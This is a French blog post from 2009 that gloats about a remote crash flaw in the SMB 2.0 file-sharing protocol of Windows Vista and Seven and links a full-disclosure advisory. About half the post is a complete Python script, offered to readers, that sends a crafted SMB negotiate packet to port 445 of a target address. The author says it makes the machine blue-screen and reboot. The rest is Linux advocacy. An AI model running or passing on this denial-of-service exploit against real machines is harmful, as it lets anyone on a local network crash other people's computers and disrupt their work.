Patrice Ferlet
Patrice Ferlet
Créateur de ce blog.
Publié le sept. 29, 2009 Temps de lecture: 2 min

Me suivre sur Mastodon

Une faille Windows Vista et Seven aberrante

Ho que c’est bon quand on est Linuxien ou Maceux et qu’on entend ce genre de choses ! C’est Nicolas Kandel, un collègue de boulot, qui vient de me parler de ça. Une faille sur Vista et Windows Seven sur le protocole SMB 2.0 (vous savez, le partage de dossier) qui permet à quiconque sur le réseau local de planter votre machine. Et ce avec un simple script python de 7 lignes !!!

Oui, 7 lignes… La page qui parle de ça se trouve ici http://seclists.org/fulldisclosure/2009/Sep/0039.html. 7 lignes de python (en fait un peu plus car le paquet envoyé est mise en forme pour être plus lisible) et voilà que le Vista ciblé vous présente un écran bleu (la tradition est importante chez Microsoft) et un redémarrage s’impose.

Le pire dans tout cela, c’est que vous, utilisateur de Vista ou Seven, n’y pouvez rien :) oui je souris, désolé.

Alors pour vous, voici le script: ` #!/usr/bin/python

When SMB2.0 recieve a “&” char in the “Process Id High” SMB header field it dies with a

PAGE_FAULT_IN_NONPAGED_AREA from socket import socket

from time import sleep

host = “IP_ADDR”, 445 buff = ( “\x00\x00\x00\x90” # Begin SMB header: Session message “\xff\x53\x4d\x42” # Server Component: SMB “\x72\x00\x00\x00” # Negociate Protocol “\x00\x18\x53\xc8” # Operation 0x18 & sub 0xc853 “\x00\x26”# Process ID High: –> :) normal value should be “\x00\x00” “\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe” “\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54” “\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31” “\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00” “\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57” “\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61” “\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c” “\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c” “\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e” “\x30\x30\x32\x00”

) s = socket()

s.connect(host) s.send(buff) s.close() `

Si vous lisez le commentaire au début de script, vous allez comprendre… en fait l’attaquant place un “&” à la place de “0” dans l’ID de processus.

Sachant que la durée de vie d’un PC sans protection sur internet est de 4 minutes et voyant ce genre de faille… je suis heureux de ne pas avoir de Windows depuis plus de 9 ans.

Alors quand vous en aurez marre de voir ce genre d’aberration, passez à Linux: Fedora, Ubuntu, ou encore http://www.debian.org/index.fr.html. Et pour ceux qui veulent autre chose que Linux, pensez à FreeBSD ou OpenBSD qui sont eux aussi des Unix.

Bref, pour ma part, je me conforte jour après jour de mon choix ! A vous de jouer !

comments powered by Disqus